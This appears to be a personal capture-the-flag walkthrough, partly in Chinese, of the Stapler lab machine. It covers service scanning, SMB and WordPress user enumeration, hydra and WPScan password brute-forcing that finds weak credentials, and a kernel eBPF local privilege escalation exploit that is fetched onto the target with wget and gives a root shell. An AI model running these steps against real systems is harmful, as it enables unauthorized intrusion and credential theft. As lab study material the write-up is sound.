fingerprint-strings: | NULL: | message2.jpgUT | QWux | "DL[E | #;3[ | \xf6 | u([r | qYQq | Y_?n2 | 3&M~{ | 9-a)T | L}AJ |_ .npy.9 3306/tcp open mysql MySQL 5.7.12-0ubuntu1 | mysql-info: | Protocol: 10 | Version: 5.7.12-0ubuntu1 | Thread ID: 7 | Capabilities flags: 63487 | Some Capabilities: LongColumnFlag, Support41Auth, SupportsCompression, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, ODBCClient, InteractiveClient, FoundRows, SupportsTransactions, SupportsLoadDataLocal, Speaks41ProtocolOld, LongPassword, IgnoreSigpipes, ConnectWithDatabase, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins | Status: Autocommit | Salt: ']r\x10o%\x0E'H\x0D_7\x08#5~fP=S |_ Auth Plugin Name: mysql_native_password 12380/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port666-TCP:V=7.95%I=7%D=3/23%Time=67E032ED%P=aarch64-unknown-linux-gnu SF:%r(NULL,2D58,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\ ... Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) |_clock-skew: mean: 2s, deviation: 4s, median: 0s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2025-03-23T16:12:46 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.9-Ubuntu) | Computer name: red | NetBIOS computer name: RED\x00 | Domain name: \x00 | FQDN: red |_ System time: 2025-03-23T16:12:47+00:00 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 198.41 seconds ``` > FTP, HTTP, Samba, SSH, Mysql, 自訂 666 #### 1.2 FTP ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ ftp Anonymous@192.168.124.148 Connected to 192.168.124.148. 220- 220-|-----------------------------------------------------------------------------------------| 220-| Harry, make sure to update the banner when you get a chance to show who has access here | 220-|-----------------------------------------------------------------------------------------| 220- 220 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 550 Permission denied. 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 107 Jun 03 2016 note 226 Directory send OK. ftp> get note local: note remote: note 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note (107 bytes). 100% |***********************************************************************************************************************************************************************************************| 107 1.22 MiB/s 00:00 ETA 226 Transfer complete. 107 bytes received in 00:00 (1.05 KiB/s) ``` ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ cat note Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John. ``` #### 1.3 HTTP Port `80` & `12380` ``` ┌──(chw㉿CHW)-[~] └─$ dirb http://192.168.124.148/ ... + http://192.168.124.148/.bashrc (CODE:200|SIZE:3771) + http://192.168.124.148/.profile (CODE:200|SIZE:675) ----------------- END_TIME: Sun Mar 23 13:28:05 2025 ``` - 查看 http://192.168.124.148/ \ ![image](https://hackmd.io/_uploads/H1lK2aT3Jl.png) - 查看 http://192.168.124.148/.bashrc \ ![image](https://hackmd.io/_uploads/ByAS5p6hJg.png) - 查看 http://192.168.124.148/.profile \ ![image](https://hackmd.io/_uploads/rJ6D9Tanye.png) - 查看 http://192.168.124.148:12380/ \ ![image](https://hackmd.io/_uploads/Hyx4TpTnye.png) > Coming soon Page > >`<!-- A message from the head of our HR department, Zoe, if you are looking at this, we want to hire you! -->` - https https://192.168.124.148:12380/ \ ![image](https://hackmd.io/_uploads/SkNFmRT3yx.png) >畫面不一樣 ?! #### 1.4 Samba ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ smbclient -N -L \\\\192.168.124.148\\ Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers kathy Disk Fred, What are we doing here? tmp Disk All temporary files should be stored here IPC$ IPC IPC Service (red server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP RED ┌──(chw㉿CHW)-[~/Stapler] └─$ enum4linux -a 192.168.124.148 Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Mar 23 13:06:47 2025 =========================================( Target Information )========================================= Target ........... 192.168.124.148 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==========================( Enumerating Workgroup/Domain on 192.168.124.148 )========================== [+] Got domain/workgroup name: WORKGROUP ==============================( Nbtstat Information for 192.168.124.148 )============================== Looking up status of 192.168.124.148 RED <00> - H <ACTIVE> Workstation Service RED <03> - H <ACTIVE> Messenger Service RED <20> - H <ACTIVE> File Server Service ..__MSBROWSE__. <01> - <GROUP> H <ACTIVE> Master Browser WORKGROUP <00> - <GROUP> H <ACTIVE> Domain/Workgroup Name WORKGROUP <1d> - H <ACTIVE> Master Browser WORKGROUP <1e> - <GROUP> H <ACTIVE> Browser Service Elections MAC Address = 00-00-00-00-00-00 ==================================( Session Check on 192.168.124.148 )================================== ... ================================( Share Enumeration on 192.168.124.148 )================================ Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers kathy Disk Fred, What are we doing here? tmp Disk All temporary files should be stored here IPC$ IPC IPC Service (red server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP RED [+] Attempting to map shares on 192.168.124.148 //192.168.124.148/print$ Mapping: DENIED Listing: N/A Writing: N/A //192.168.124.148/kathy Mapping: OK Listing: OK Writing: N/A //192.168.124.148/tmp Mapping: OK Listing: OK Writing: N/A [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* //192.168.124.148/IPC$ Mapping: N/A Listing: N/A Writing: N/A ==========================( Password Policy Information for 192.168.124.148 )========================== [+] Attaching to 192.168.124.148 using a NULL share [+] Trying protocol 139/SMB... [+] Found domain(s): [+] RED [+] Builtin [+] Password Info for Domain: RED [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: Not Set [+] Password Complexity Flags: 000000 ... [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 [+] Enumerating users using SID S-1-5-21-864226560-67800430-3082388513 and logon username '', password '' S-1-5-21-864226560-67800430-3082388513-501 RED\nobody (Local User) S-1-5-21-864226560-67800430-3082388513-513 RED\None (Domain Group) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\peter (Local User) S-1-22-1-1001 Unix User\RNunemaker (Local User) S-1-22-1-1002 Unix User\ETollefson (Local User) S-1-22-1-1003 Unix User\DSwanger (Local User) S-1-22-1-1004 Unix User\AParnell (Local User) S-1-22-1-1005 Unix User\SHayslett (Local User) S-1-22-1-1006 Unix User\MBassin (Local User) S-1-22-1-1007 Unix User\JBare (Local User) S-1-22-1-1008 Unix User\LSolum (Local User) S-1-22-1-1009 Unix User\IChadwick (Local User) S-1-22-1-1010 Unix User\MFrei (Local User) S-1-22-1-1011 Unix User\SStroud (Local User) S-1-22-1-1012 Unix User\CCeaser (Local User) S-1-22-1-1013 Unix User\JKanode (Local User) S-1-22-1-1014 Unix User\CJoo (Local User) S-1-22-1-1015 Unix User\Eeth (Local User) S-1-22-1-1016 Unix User\LSolum2 (Local User) S-1-22-1-1017 Unix User\JLipps (Local User) S-1-22-1-1018 Unix User\jamie (Local User) S-1-22-1-1019 Unix User\Sam (Local User) S-1-22-1-1020 Unix User\Drew (Local User) S-1-22-1-1021 Unix User\jess (Local User) S-1-22-1-1022 Unix User\SHAY (Local User) S-1-22-1-1023 Unix User\Taylor (Local User) S-1-22-1-1024 Unix User\mel (Local User) S-1-22-1-1025 Unix User\kai (Local User) S-1-22-1-1026 Unix User\zoe (Local User) S-1-22-1-1027 Unix User\NATHAN (Local User) S-1-22-1-1028 Unix User\www (Local User) S-1-22-1-1029 Unix User\elly (Local User) ``` > `//192.168.124.148/kathy Mapping: OK Listing: OK Writing: N/A`\ `//192.168.124.148/tmp Mapping: OK Listing: OK Writing: N/A` >> user 建立成 user.txt smbclient 查看 share dir ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ cat SMB_Kathy/kathy_stuff/todo-list.txt I'm making sure to backup anything important for Initech, Kathy ┌──(chw㉿CHW)-[~/Stapler] └─$ cat SMB_Kathy/backup/vsftpd.conf # Example config file /etc/vsftpd.conf ... local_root=/etc ... rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key ssl_enable=NO ┌──(chw㉿CHW)-[~/Stapler/SMB_Kathy/backup] └─$ tar -xzvf wordpress-4.tar.gz wordpress/ wordpress/wp-settings.php wordpress/wp-cron.php wordpress/wp-comments-post.php wordpress/wp-activate.php wordpress/wp-admin/ ... ``` > ftp conf 與 一坨 Wordpress #### 1.5 Zip 自定義的 tcp port 666 ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ nc 192.168.124.148 666 > file.zip ┌──(chw㉿CHW)-[~/Stapler] └─$ unzip file.zip Archive: file.zip inflating: message2.jpg ``` ![message2](https://hackmd.io/_uploads/S19Wh6a31e.jpg) >[!Important] > Recon 總結: > 1. http://192.168.124.148:12380/ 可能有用途\ > HR `Zoe` \ > Web Server 可能與 `SMB_Kathy/backup/wordpress` 有關 > 2. 可利用 SMB share folder 上傳 > 3. SMB User > 4. `SMB_Kathy/backup/vsftpd.conf`: rsa key > 5. mysql ### 2. Hydra SSH 使用 `enum4linux` 收集到的 user.txt,爆破 SSH ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ cat user.tx peter RNunemaker ETollefson DSwanger AParnell ... ┌──(chw㉿CHW)-[~/Stapler] └─$ hydra -L user.tx -P /usr/share/wordlists/rockyou.txt ... [DATA] attacking ssh://192.168.124.148:22/ [STATUS] 112.00 tries/min, 112 tries in 00:01h, 430331952 to do in 64037:30h, 12 active ``` > 需要好幾天,不太可能 ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ hydra -L user.tx -P user.tx ssh://192.168.124.148 -e nsr ... [22][ssh] host: 192.168.124.148 login: SHayslett password: SHayslett .... ``` > 成功了... ### 3. HTTP Recon 回去看 `https://192.168.124.148:12380/` 與 `http://192.168.124.148:12380/`\ 發現新路徑 ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ dirb https://192.168.124.148:12380/ ... ---- Scanning URL: https://192.168.124.148:12380/ ---- ==> DIRECTORY: https://192.168.124.148:12380/announcements/ + https://192.168.124.148:12380/index.html (CODE:200|SIZE:21) ==> DIRECTORY: https://192.168.124.148:12380/javascript/ ==> DIRECTORY: https://192.168.124.148:12380/phpmyadmin/ + https://192.168.124.148:12380/robots.txt (CODE:200|SIZE:59) + https://192.168.124.148:12380/server-status (CODE:403|SIZE:306) ``` - 瀏覽 https://192.168.124.148:12380/announcements/ \ ![image](https://hackmd.io/_uploads/BkPjdR6nkg.png) > message.txt: `Abby, we need to link the folder somewhere! Hidden at the mo` - 瀏覽 https://192.168.124.148:12380/robots.txt \ ![image](https://hackmd.io/_uploads/SkqONCp2kg.png) - 瀏覽 https://192.168.124.148:12380/admin112233/ \ ![image](https://hackmd.io/_uploads/r1C9VR6h1g.png) - 瀏覽 https://192.168.124.148:12380/blogblog/ \ ![image](https://hackmd.io/_uploads/ryfbBA62Je.png) - 瀏覽 `view-source:https://192.168.124.148:12380/blogblog/`\ ![image](https://hackmd.io/_uploads/ryTEBAp21e.png) > 可能與 `SMB_Kathy/backup/wordpress` 有關 進到 Wordpress 登入頁面\ ![image](https://hackmd.io/_uploads/r1ysBCphkx.png) - 瀏覽 https://192.168.124.148:12380/phpmyadmin/ \ ![image](https://hackmd.io/_uploads/HyBlKAp3kg.png) > view-source:https://192.168.124.148:12380/phpmyadmin/ 中取得 >`https://192.168.124.148:12380/phpmyadmin/doc/html/index.html` \ > ![image](https://hackmd.io/_uploads/HkiY90an1l.png) > > phpMyAdmin 4.5.4.1 > > `searchsploit phpMyAdmin 4.5`: 沒有結果 ### 4. WPscan ``` ┌──(chw㉿CHW)-[~] └─$ wpscan --url https://192.168.124.148:12380/blogblog/ --enumerate p --plugins-detection aggressive --disable-tls-checks ... [+] WordPress theme in use: bhost | Location: https://192.168.124.148:12380/blogblog/wp-content/themes/bhost/ | Last Updated: 2025-03-07T00:00:00.000Z | Readme: https://192.168.124.148:12380/blogblog/wp-content/themes/bhost/readme.txt | [!] The version is out of date, the latest version is 1.9 | Style URL: https://192.168.124.148:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1 | Style Name: BHost | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ... ... [+] two-factor | Location: https://192.168.124.148:12380/blogblog/wp-content/plugins/two-factor/ | Latest Version: 0.12.0 | Last Updated: 2025-02-14T15:58:00.000Z | Readme: https://192.168.124.148:12380/blogblog/wp-content/plugins/two-factor/readme.txt | [!] Directory listing is enabled ... ┌──(chw㉿CHW)-[~] └─$ wpscan --url https://192.168.124.148:12380/blogblog/ --enumerate u --disable-tls-checks [i] User(s) Identified: [+] John Smith | Found By: Author Posts - Display Name (Passive Detection) | Confirmed By: Rss Generator (Passive Detection) [+] john | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) [+] garry | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) [+] elly | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) [+] peter [+] barry [+] heather [+] harry [+] scott [+] kathy [+] tim ``` > Plugin: `bhost`\ > User 建立 wpuser.txt 使用 cewl 與 密碼爆破 ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ cat wpuser.txt John Smith john garry elly peter barry ... ┌──(chw㉿CHW)-[~/Stapler] └─$ cewl -w custom_wordlist.txt https://192.168.124.148:12380/blogblog/ ┌──(chw㉿CHW)-[~/Stapler] └─$ wpscan --url https://192.168.124.148:12380/blogblog/ -U wpuser.txt -P custom_wordlist.txt --force --disable-tls-checks ... [+] Performing password attack on Xmlrpc Multicall against 11 user/s [SUCCESS] - tim / thumb [SUCCESS] - garry / football ``` >[!Important] >總結: >- SSH: `SHayslett:SHayslett`\ >- Wordpress: `tim:thumb` & `garry:football` > >還沒利用的攻擊面: >- Wordpress bhost >- phpMyadmin login >- mysql >- SMB share folder 上傳 >- `SMB_Kathy/backup/vsftpd.conf`: rsa key ### 5. SSH Login ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ ssh SHayslett@192.168.124.148 ... SHayslett@red:~$ whoami SHayslett SHayslett@red:~$ pwd /home/SHayslett ``` ### ✅ Get User Flag > 在 `/home/`找到 User flag ## Privileges Escalation ### 6. 確認 User ``` SHayslett@red:/$ ls /home AParnell Drew elly jamie JKanode local.txt MBassin NATHAN Sam SStroud zoe CCeaser DSwanger ETollefson JBare JLipps LSolum mel peter SHAY Taylor CJoo Eeth IChadwick jess kai LSolum2 MFrei RNunemaker SHayslett www SHayslett@red:/$ cat /etc/passwd root:x:0:0:root:/root:/bin/zsh daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ... messagebus:x:108:111::/var/run/dbus:/bin/false sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash ETollefson:x:1002:1002::/home/ETollefson:/bin/bash DSwanger:x:1003:1003::/home/DSwanger:/bin/bash AParnell:x:1004:1004::/home/AParnell:/bin/bash SHayslett:x:1005:1005::/home/SHayslett:/bin/bash MBassin:x:1006:1006::/home/MBassin:/bin/bash JBare:x:1007:1007::/home/JBare:/bin/bash LSolum:x:1008:1008::/home/LSolum:/bin/bash IChadwick:x:1009:1009::/home/IChadwick:/bin/false MFrei:x:1010:1010::/home/MFrei:/bin/bash SStroud:x:1011:1011::/home/SStroud:/bin/bash CCeaser:x:1012:1012::/home/CCeaser:/bin/dash JKanode:x:1013:1013::/home/JKanode:/bin/bash CJoo:x:1014:1014::/home/CJoo:/bin/bash Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin JLipps:x:1017:1017::/home/JLipps:/bin/sh jamie:x:1018:1018::/home/jamie:/bin/sh Sam:x:1019:1019::/home/Sam:/bin/zsh Drew:x:1020:1020::/home/Drew:/bin/bash jess:x:1021:1021::/home/jess:/bin/bash SHAY:x:1022:1022::/home/SHAY:/bin/bash Taylor:x:1023:1023::/home/Taylor:/bin/sh mel:x:1024:1024::/home/mel:/bin/bash kai:x:1025:1025::/home/kai:/bin/sh zoe:x:1026:1026::/home/zoe:/bin/bash NATHAN:x:1027:1027::/home/NATHAN:/bin/bash www:x:1028:1028::/home/www: postfix:x:112:118::/var/spool/postfix:/bin/false ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false elly:x:1029:1029::/home/elly:/bin/bash ``` ### 7. Sudo -l ``` SHayslett@red:/$ sudo -l We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. [sudo] password for SHayslett: Sorry, user SHayslett may not run sudo on red. ``` > SHayslett 沒有 sudo 權限 ### 8. Writable File ``` SHayslett@red:/$ find / -writable -type d 2>/dev/null /var/www/https/blogblog/wp-content/uploads /var/crash /var/tmp /var/spool/samba /var/lib/php/sessions /var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1005.slice/user@1005.service /var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1005.slice/user@1005.service/init.scope /proc/8497/task/8497/fd /proc/8497/fd /proc/8497/map_files ... ``` > 沒有可用資訊 ### 9. System ``` SHayslett@red:/$ uname -a Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux SHayslett@red:/$ cat /etc/lsb-release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=16.04 DISTRIB_CODENAME=xenial DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS" ``` (Kali) ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ searchsploit Linux red 4.4 ----------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------- --------------------------------- Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) | linux/local/9479.c Redis-cli < 5.0 - Buffer Overflow (PoC) | linux/local/44904.py ----------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ┌──(chw㉿CHW)-[~/Stapler] └─$ searchsploit Ubuntu 16.04 ----------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------- --------------------------------- Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution | linux/local/40937.txt Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | linux/local/40054.c Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbn | linux/local/40943.txt LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation | linux/local/41923.txt Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / C | linux_x86-64/local/42275.c Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'lds | linux_x86/local/42276.c Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | linux/dos/39773.txt Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary Fi | linux/local/45175.c Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit) | linux/local/40759.rb Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak | linux/dos/46529.c Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privil | linux_x86-64/local/40871.c Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds | linux_x86-64/local/40049.c Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condi | windows_x86-64/local/47170.c Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege | linux/local/39772.txt Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escala | linux/local/40489.txt Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer | linux/dos/45919.c Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privi | linux_x86-64/local/44300.c Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escala | linux/local/43418.c Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Lo | linux/local/47169.c ----------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ``` 查看 exploit ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ searchsploit -x 41923 ┌──(chw㉿CHW)-[~/Stapler] └─$ searchsploit -x 39772 ┌──(chw㉿CHW)-[~/Stapler] └─$ searchsploit -m 39772 ``` ### 10. exploit ``` ┌──(chw㉿CHW)-[~/Stapler] └─$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip ┌──(chw㉿CHW)-[~/Stapler] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` ``` SHayslett@red:/$ cd /tmp SHayslett@red:/tmp$ wget http://192.168.45.178/39772.zip SHayslett@red:/tmp$ unzip 39772.zip SHayslett@red:/tmp$ cd 39772 SHayslett@red:/tmp/39772$ ls crasher.tar exploit.tar SHayslett@red:/tmp/39772$ tar -vxf exploit.tar ebpf_mapfd_doubleput_exploit/ ebpf_mapfd_doubleput_exploit/hello.c ebpf_mapfd_doubleput_exploit/suidhelper.c ebpf_mapfd_doubleput_exploit/compile.sh ebpf_mapfd_doubleput_exploit/doubleput.c SHayslett@red:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/ SHayslett@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ chmod +x * SHayslett@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh doubleput.c: In function ‘make_setuid’: doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .insns = (__aligned_u64) insns, ^ doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .license = (__aligned_u64)"" ^ SHayslett@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput starting writev woohoo, got pointer reuse writev returned successfully. if this worked, you'll have a root shell in <=60 seconds. suid file detected, launching rootshell... we have root privs now... root@red:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami root root@red:/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root root@red:/root# ls fix-wordpress.sh flag.txt issue proof.txt wordpress.sql ``` ### ✅ Get Root FLAG